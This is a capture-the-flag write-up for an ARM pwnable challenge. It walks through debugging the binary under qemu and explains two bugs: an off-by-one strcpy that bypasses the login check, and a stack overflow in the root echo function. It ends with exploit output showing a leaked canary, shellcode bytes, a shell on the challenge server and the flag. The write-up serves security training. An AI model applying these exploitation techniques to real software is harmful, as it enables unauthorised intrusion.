Rating:

# arm-exploit
**Category:** Pwnable
**Points:** 856
**Solves:** 13
**Description:**
> Download in : [Link](https://drive.google.com/open?id=1aM2CTWFxKetOTMNfck71Bxv_ZGw05IzF)
> Service: nc armexploit.acebear.site 3001

## Writeup
```
$ file arm-exploit
arm-exploit: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.3, for GNU/Linux 3.2.0, BuildID[sha1]=cbaf26f5088911adc7a36ef8ac96660a33f617d1, not stripped
```

### Setup Environment
#### Install
```
sudo apt-get install qemu
sudo apt-get install qemu-user-static kpartx
sudo apt-get install gdb-multiarch
```

#### Run
```
$ qemu-arm-static ./arm-exploit
**************************Welcome to Arm Exploit**************************
* *
*************************Challenge Created By CNV*************************
* Team: AceBear *
* My blog: https://chung96vn.blogspot.com/ *
**************************************************************************
*******************Arm Exploit******************
* *
* 1 - info *
* 2 - login *
* 3 - echo *
* 4 - change username *
* 5 - exit *
************************************************
Your choice:
```

#### Debug over gdb-multiarch
Terminal 1
> qemu-arm-static -g 12345 ./arm-exploit

Terminal 2
```
$ gdb-multiarch
pwndbg> set architecture arm
The target architecture is assumed to be arm
pwndbg> target remote localhost:12345
Remote debugging using localhost:12345
0xf67d6a40 in ?? ()
...
► f 0 f67d6a40
pwndbg>
```

#### Run over python script
```python
import pwntools
r = process(["qemu-arm-static","-g","12345", "./arm-exploit"]) # run and debug
r = process(["qemu-arm-static","./arm-exploit"]) # Just run
```

### The Bug
Binary has some functions: genpass, info, login, echo, change username and exit.

First bug in **change_username** function:
* user input max 0x20 bytes into buf on stack
* strcpy(USER, buf) if 0x20 bytes buf not null then 0x20 bytes copy into USER and last null bytes will copy to USER+0x20 == isGuestLogin => isGuestLogin = 0 => bypass root login then we can use rootecho function.
```
.bss:0002209C USER % 0x20 ; DATA XREF: info+28↑o
.bss:000220BC isGuestLogin % 4 ; DATA XREF: info+48↑r
```

Second bug in **rootecho** function:
* buff in FP-0x88 but read 0x100 bytes => stack overflow.
```c
int rootecho()
{
int result; // r0
char s1; // [sp+4h] [bp-88h]
_BYTE v2[3]; // [sp+9h] [bp-83h]
int v3; // [sp+84h] [bp-8h]

v3 = _bss_start;
while ( 1 )
{
printf("root@arm-exploit:~$ ");
secure_read(&s1, 0x100u); // <======= Bug Here
result = strcmp(&s1, "exit");
if ( !result )
break;
if ( !strcmp(&s1, "help") )
{
puts("List command:");
puts("$ echo argument");
puts("$ exit");
puts("$ help");
}
else if ( !memcmp(&s1, "echo ", 5u) )
{
puts(v2);
}
else
{
puts("Invalid Command! Try help");
}
}
return result;
}
```
### Exploit
[arm_exploit.py](/pwn/arm_exploit/arm_exploit.py)
```
$ python arm.py 3
[+] Opening connection to armexploit.acebear.site on port 3001: Done
[*] canary: 0xd4bae800
[*] stack: 0xf6fffb34
[*] buff: 0xf6fffab0
[*] Paused (press any to continue)
[*] Switching to interactive mode
AAAAAAA?0\x8f��/�xF\x0e0?\x90I\x1a\x92\x1a'�Q\x037?�/bin//sh
root@arm-exploit:~$ $ id
uid=1000(arm_exploit) gid=1000(arm_exploit) groups=1000(arm_exploit)
$ cat /ho*/*/flag
AceBear{arm_i5_my_sad_m3m0ry}$
```

Original writeup (https://github.com/phieulang1993/ctf-writeups/tree/master/2018/AceBearSecurityContest/pwn/arm_exploit).